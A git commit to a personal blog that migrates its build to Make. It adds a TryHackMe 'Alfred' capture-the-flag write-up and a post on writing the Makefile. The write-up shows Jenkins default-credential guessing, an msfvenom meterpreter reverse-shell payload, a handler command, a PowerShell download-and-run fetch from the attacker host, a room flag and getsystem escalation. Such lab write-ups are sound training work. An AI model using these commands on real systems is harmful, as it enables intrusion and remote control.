Published THM: Alfred, THM: GameZone, Making Life easy and migrated t…

…o Make

.github/workflows/publish.yml

@@ -18,14 +18,11 @@ jobs:
       - name: Install imagemagick
         run: sudo apt install imagemagick --yes
 
-      - name: Build the site
-        run: ./build.sh
+      - name: Install make
+        run: sudo apt install make --yes
 
-      - name: Add latest posts
-        run: ./latestposts.sh
-
-      - name: Copy index html to secondary location
-        run: cp public/index.html public/posts/index.html
+      - name: Run make
+        run: make publish
 
       - name: Publish generated content to GitHub Pages
         uses: JamesIves/github-pages-deploy-action@4.1.4

Makefile

@@ -0,0 +1,40 @@
+# Makefile for building and publishing a site
+# Directories
+PUBLIC_DIR := public
+POSTS_DIR := $(PUBLIC_DIR)/posts
+
+# Targets
+.DEFAULT_GOAL := local
+
+# Remove local directory
+clean:
+	echo "Cleaning public dir"
+	@if [ -d $(PUBLIC_DIR) ]; then \
+		rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \
+	fi
+
+# Build the site using Emacs
+build: clean
+	echo "Building the site"
+	emacs -Q --script build-site.el
+
+# Add latest posts to /index.html
+add_latest_posts:
+	echo "Adding latest posts (archive) on /index.html"
+	echo '<ul class="org-ul indexul">' > /tmp/index
+	grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index
+	echo '</ul>' >> /tmp/index
+	sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html
+
+# Copy /index.html to /posts/index.html
+copy_index_to_posts:
+	echo "Copying /index to /posts/index"
+	cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html
+
+# Serve the public directory on localhost using Python
+serve_local:
+	cd $(PUBLIC_DIR) && python3 -m http.server
+
+# Build the site locally
+local: build add_latest_posts copy_index_to_posts serve_local
+blog: build add_latest_posts copy_index_to_posts 

content/posts/20231130_thm_alfred.org

@@ -0,0 +1,126 @@
+#+TITLE: THM: Alfred
+#+DATE: <2023-11-30 14:34>
+#+DESCRIPTION: 
+#+FILETAGS: thm ctf
+
+* Intro: Be Yourself                                               :noexport:
+
+Sometimes clashing with others, even temporarily, is unavoidable. 
+
+
+* Intro
+This time, other than just populating ~/etc/hosts~ with ~alfred.thm~, I
+also ran the following, to help me use my /standardized/ notes.
+ #+NAME: add to all shell
+ #+begin_src bash
+ echo "export IP=alfred.thm" >> ~/.bashrc
+ #+end_src
+
+* Reconnaissance
+Simple nmap scan to find our open tcp ports:
+#+begin_src bash
+nmap -sV -sC -oN nmap.initial $IP
+#+end_src
+
+And this gives us:
+- [ ] 80 (HTTP)
+- [ ] 3389 (TCpwrapped) - Alfred
+- [ ] 8080 (HTTP)
+
+** Web Analysis: Port 80 Web Server
+- Minimal starting web page, started gobuster while trying the usual
+  spots. Nothing of interest came up
+- Gobuster with big revealed nothing
+
+#+NAME: Gobuster with IP and default path
+#+begin_src bash
+gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -u http://$IP -o gobuster.big
+#+end_src
+
+** Web Analysis: Port 8080 Web Server
+- Jenkins entry portal
+- Robots.txt disallows everything on root
+- The password is at this point unknown
+  - I searched online for the default (and popular) credentials:
+    - Admin:password (did not work)
+    - Admin:admin (did not work)
+    - some other combs
+    - found the actual one
+
+      #+begin_comment
+admin:admin
+      #+end_comment
+#+caption: Jenkins Entry portal
+[[file:images/Reconnaissance/20231130_145031_screenshot.png]]
+
+
+
+#+begin_quote
+At this point I viewed another writeup, to see how they had solved
+that step, since my solution was at best sketchy. Hydra bruteforce was
+another, better way to go.
+#+end_quote
+
+* Using Alfred
+Since I already knew that Alfred is a CI/CD server, even though I had
+never worked on it, it was relatively simple:
+- I knew there had to be a way to build the projects, and sure enough
+  that action was *directly* modifiable.
+
+  #+caption: Build configuration screen
+[[file:images/Using_Alfred/20231201_231517_screenshot.png]]
+
+At this point, it is obvious that we need to get initial foothold
+through a reverse shell of some kind. I saw the room's suggestion of
+uploading and then executing one there, but I first wanted to try it
+my way.
+
+Using [[https://www.revshells.com/][online rev shell generator]], I got a reverse shell, but it did
+not exactly look beautiful. Python did not exist on the system, which
+made me unable to use the now-standard, pty spawn methodology.
+However, that did not stop me from getting the flag. Unlikeable is not unusable.
+
+ #+begin_comment
+79007a09481963edf2e1321abd9ae2a0
+ #+end_comment
+
+* Upgrading our shell
+The room then suggests that we get a meterpreter shell, which I again,
+trying to avoid the /walkthrough/ character of it, did my way.
+
+** MSFvenom
+Just a simple meterpreter reverse shell:
+
+#+NAME: MSFvenom reverse shell generation
+#+begin_src cmd
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.67.161 LPORT=6969 -f exe -o reverse.exe
+#+end_src
+
+
+** Meterpreter listener
+Get the listener up and running
+
+#+NAME: MSFvenom reverse shell generation
+#+begin_src cmd
+msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.67.161; set lport 6969; exploit"
+#+end_src
+
+** Downloading File
+My experience with windows is quite limited and that's why I had to go
+into a little bit more research to get this over with :(
+
+Having found an interesting article in the [[http://blog.commandlinekungfu.com/2009/11/episode-70-tangled-web.html][Command Line Kung Fu]]
+blog, I started with the following
+#+begin_src cmd
+powershell -c '(New-Object System.Net.WebClient).DownloadFile("http://10.10.67.161:8000/reverse.exe","c:\Users\bruce\reverse.exe")'
+#+end_src
+
+But it did not work. Even though it did not return any error codes, I
+could see in my simple python server that no requests had been made.
+Evidently it did not need that many modifications to work, it is just
+that I may have used a syntax that resembled way too much this
+procedure in Linux.
+
+* Privilege escalation
+Sadly ~getsystem~ works perfectly, and we get ~NT AUTHORITY\SYSTEM~,
+without it being necessary to do anything.

content/posts/20231227_making_my_life_easier.org

@@ -0,0 +1,96 @@
+#+TITLE: Make-ing my life easier
+#+DATE: <2023-12-27 12:25>
+#+DESCRIPTION: Notes on how I migrated to Make for this website, so that I can easily preview my posts before publishing
+#+FILETAGS: make python blog config
+
+
+* Introduction
+#+begin_comment
+This is the second article for the day, but it is simply the result of
+a longer period of not publishing.
+#+end_comment
+
+At the time of writing my blog directory surely is cluttered, and I
+*really* do not want this. It prevents me from easily checking my
+website (not sure if the clutter caused my lack of proper at times
+documentation or the other way round), but it has to change. Here I
+expect to document the next 10 minutes briefly for me, so that it all
+makes sense
+
+* Goal
+What I expect to do here is quickly create a makefile, with a ~local~
+set of instructions, that will:
+1. Create a ~public~ directory and populate it
+2. Launch a python server
+
+* Execution
+Using the ~local-build.sh~ script, I knew this would not take too much.
+Being an open source file and not really bothered by the
+confidentiality of its contents, I uploaded it to ChatGPT asking for
+it to be refactored and documented into a Makefile:
+#+begin_example
+# Makefile for building and publishing a site
+# Directories
+PUBLIC_DIR := public
+POSTS_DIR := $(PUBLIC_DIR)/posts
+
+# Targets
+.DEFAULT_GOAL := local
+
+# Remove local directory
+clean:
+	@if [ -d $(PUBLIC_DIR) ]; then \
+		rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \
+	fi
+
+# Build the site using Emacs
+build: clean
+	emacs -Q --script build-site.el
+
+# Add latest posts to /index.html
+add_latest_posts:
+	echo "Adding mini archive on /index.html"
+	echo '<ul class="org-ul indexul">' > /tmp/index
+	grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index
+	echo '</ul>' >> /tmp/index
+	sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html
+
+# Copy /index.html to /posts/index.html
+copy_index_to_posts:
+	echo "Copying /index to /posts/index"
+	cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html
+
+# Build the site locally
+local: build add_latest_posts copy_index_to_posts
+#+end_example
+
+It did a good job, which I suppose can also be attributed to the
+proper yet by no means extensive commenting on the shell script.
+
+Adding a new target and updating local does the job:
+#+begin_example
+# Serve the public directory on localhost using Python
+serve_local:
+	cd $(PUBLIC_DIR) && python -m http.server
+#+end_example
+
+* Completion
+At this point everything is perfect, and well documented enough that I
+could refactor the whole blog, where spaghetti code is not only
+dominant but visible in its basic structure and organization as well,
+making it more manageable. 
+
+* Some extra thoughts
+It is truly fascinating that I managed within *much less* than fifteen
+minutes to:
+- make a shell script obsolete
+- make another shell script obsolete (further reducing the mess that I
+  had embraced and my discomfort)
+- Better streamline the whole publish sequence by creating a central
+  file to use (makefile)
+- write this simple article
+
+With *minimal* experience in using and creating Makefiles. In fact,
+I thought I could try my hand at creating this manually and googled
+*Makefile templates* before realizing what a waste of time this would
+be. Ah, what a wonderful and yet peculiar time to be alive!